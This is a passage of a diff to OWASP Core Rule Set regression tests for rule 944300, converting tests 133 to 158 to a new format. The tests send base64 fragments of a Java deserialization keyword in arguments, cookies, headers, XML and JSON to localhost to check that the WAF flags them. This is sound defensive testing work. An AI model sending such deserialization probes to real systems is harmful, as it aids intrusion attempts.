"{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 133 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 134 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 135 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-136 + - input: + dest_addr: "127.0.0.1" + 
port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 136 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 137 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 138 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 139 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 140 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 141 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 142 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": 
\"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 143 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 144 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 145 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 146 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 147 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 148 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 149 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 150 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 151 desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: 
+ log: + expect_ids: [944300] + - test_id: 152 desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-153 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 153 desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 154 desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 155 desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 156 desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 157 desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
test=BpbnN0YW50aWF0ZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 158 desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 